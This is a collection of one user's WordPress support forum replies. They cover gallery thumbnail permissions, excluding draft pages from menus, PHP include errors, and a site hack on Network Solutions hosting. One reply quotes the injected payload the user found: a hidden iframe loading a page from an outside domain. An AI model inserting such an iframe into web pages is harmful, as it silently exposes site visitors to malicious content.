bychow26
Forum Replies Created
-
Ov3rfly,
Thank you for the tip! I updated to the newest WP version and it seems to be working as it is supposed to. Thanks a lot for your help on this!
Got i…it is a permissions problem on the thumb. Is this addressed in the new version of the plug in?
Brian
Correction, the image is there if you click on it, but it is not building a thumbnail for it.
Forum: Fixing WordPress
In reply to: Pages with Draft Status not showing upThank you for the help, much appreciated!!!
Brian
Forum: Fixing WordPress
In reply to: Pages with Draft Status not showing upFYI, I found this plug in that seems to works well so far.
http://wordpress.org/extend/plugins/exclude-pages/I would still like to know how to edit that piece of php above if you would like to illustrate. Thank you for your help!!
Brian
Forum: Fixing WordPress
In reply to: Pages with Draft Status not showing upesmi,
Thank you, I tried adding the exclude parameter, but I did not get it right. I put them in a child sub menu and accomplished what I needed, but I would still like to learn how to do this.Could you tell me how I should have done it with the following code:
<div id=”navbar”>
<div id=”navbarleft”>
<ul id=”nav”>- “><?php _e(“Home”, ‘studiopress’); ?>
<?php wp_list_pages(‘title_li=&depth=4&sort_column=menu_order’); ?>
</div>
Thank you,
BrianForum: Fixing WordPress
In reply to: Pages with Draft Status not showing upCan you advise how to “exclude them from any page menus”?
Thank you!
BrianForum: Plugins
In reply to: [Plugin: NextGEN Gallery] The thumbnails won’t show up..OK, I got a response from the plug in creator. He called out a problem with the thumbs permissions. Make sure the thumb’s permission is set to “read” for public. Once I changed all of the ones in question, they showed up. I don’t know what exactly changed on my server to create this issue, but it is there. I don’t believe it is with the plugin, I think it is due to a Network Solutions hack I have been dealing with and the security on my site has been ramped up.
Either way, change the permissions and all is well.
Forum: Plugins
In reply to: Nextgen thumbnail problemSame for me too. Any advice here?
Forum: Plugins
In reply to: [Plugin: NextGEN Gallery] The thumbnails won’t show up..Here is the error I get when I attempt to edit the thumbnail.
Warning: include(./wp-content/themes/architectura/php/rss.php) [function.include]: failed to open stream: No such file or directory in /data/18/1/146/112/1635112/user/1762654/htdocs/business/wp-content/themes/architectura/functions.php on line 766
Warning: include(./wp-content/themes/architectura/php/rss.php) [function.include]: failed to open stream: No such file or directory in /data/18/1/146/112/1635112/user/1762654/htdocs/business/wp-content/themes/architectura/functions.php on line 766
Warning: include() [function.include]: Failed opening ‘./wp-content/themes/architectura/php/rss.php’ for inclusion (include_path=’.:/usr/services/vux/lib/php’) in /data/18/1/146/112/1635112/user/1762654/htdocs/business/wp-content/themes/architectura/functions.php on line 766
Forum: Plugins
In reply to: [Plugin: NextGEN Gallery] The thumbnails won’t show up..I have the same problem. One gallery worked fine when I did it a week or so ago, but the new gallery is not displaying the thumbs in the admin area or on the page.
Forum: Fixing WordPress
In reply to: SQL attack on wpress 2.9.2After 1 hour 45 minute hold, here is what I found out. BTW, the tech was a pretty good guy and I have to admit he was helpful. In a nutshell, their stance is that we need to go back to the supported 2.9.1 version of WP instead of the 2.9.2 beta. He admitted that he was not 100% positive that this would solve it, but felt it would.
Any thoughts on this…?
Forum: Fixing WordPress
In reply to: SQL attack on wpress 2.9.2I am currently on hold with Net Sol for more than 1 hour without anyone answering. Uggggg!
I have used the solution from one of the earlier posts where I go to wp_options and change the site URL and it still works. I recently changed all database and WP passwords and just got hacked again a little while ago with the:
“><iframe style=”display:none” height=”0″ width=”1″ src=”http://mainnetsoll.com/grep/”></iframe>
Very frustrating. I see that Net Sol only offers the suggestion of re-installing WP. I may be wrong here, but does that mean all data wiped off the server then re-uploading or just overwriting WP? Either way, won’t I be bringing residual code back in?
On a side note, I have two WP directories running on this server. Each has it’s own database. When I go to Net Sol database configure area, one lets me update the user/pass and backups. The other does not. It will not let me change any of it and it gives me an error about 16 characters in my user (it is only 9 and all protocol has been followed. Does this tell anyone anything?
Forum: Fixing WordPress
In reply to: SQL attack on wpress 2.9.2Good call, thanks.
This server only has WP on it for the most part.
Fingers crossed.
Forum: Fixing WordPress
In reply to: SQL attack on wpress 2.9.2Thank you. This is a stupid question, but how do I scan my ftp server? Do I literally read every line of code or is there a scanning plugin/software?